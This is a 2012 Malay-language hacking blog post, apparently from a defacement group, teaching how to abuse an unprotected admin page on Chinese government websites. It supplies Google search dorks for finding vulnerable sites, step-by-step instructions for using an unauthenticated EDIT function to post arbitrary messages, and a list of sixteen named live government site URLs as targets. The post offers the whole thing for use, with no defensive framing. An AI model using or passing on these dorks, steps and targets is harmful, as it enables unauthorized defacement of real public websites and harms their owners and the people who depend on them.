Wednesday, 15 February 2012

China Gov Site - Write Vulnerability


Assalamualaikum dan salam sejahtera.hari ini aku nak ajar exploit baru.
Exploit ni membenarkan anda untuk menulis perkataan/pesanan di website tersebut secara sesuka hati.haha

Jom mula.

1. Cari web target guna salah satu dork :
  • "inurl:admin/gg1/list.asp"
  • "inurl:admin/gg1/"
2. Buka web target, translate page menggunakan google translator dan cari perkataan MANAGEMENT: EDIT.

Click EDIT.

3. Lepas itu akan terpapar seperti dibawah :


Masukkan perkataan-perkataan korang.Selepas tu click DETERMINE

4. Untuk melihat hasil tambah di belakang url : /admin/gg1/list.asp
Contoh :
http://www.target.com/admin/gg1/list.asp

5. Hasil :


Credit to : Devils's Cafe

Live Target :

http://fpb.zhuxi.gov.cn/admin/gg1/list.asp
http://www.tianzhushan.gov.cn/admin/gg1/list.asp
http://www.jtzl.gov.cn/admin/gg1/list.asp
http://www.dbs110.gov.cn/admin/gg1/list.asp
http://www.rzrsld.gov.cn/admin/gg1/list.asp
http://www.xiejia.gov.cn/admin/gg1/list.asp
http://www.qjrenda.gov.cn/admin/gg1/list.asp
http://www.investna.gov.cn/admin/gg1/list.asp
http://www.bzhbj.gov.cn/admin/gg1/list.asp
http://www.kfxrmzf.gov.cn/admin/gg1/list.asp
http://www.westkj.gov.cn/admin/gg1/list.asp
http://www.ytjtw.gov.cn/admin/gg1/list.asp
http://www.jjmaqiao.gov.cn/admin/gg1/list.asp
http://xnmw.xining.gov.cn/admin/gg1/list.asp
http://www.dantulss.gov.cn/admin/gg1/list.asp
http://www.bazhouhb.gov.cn/admin/gg1/list.asp

Itu saja.Assalamualaikum~~
Item Reviewed: China Gov Site - Write Vulnerability Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com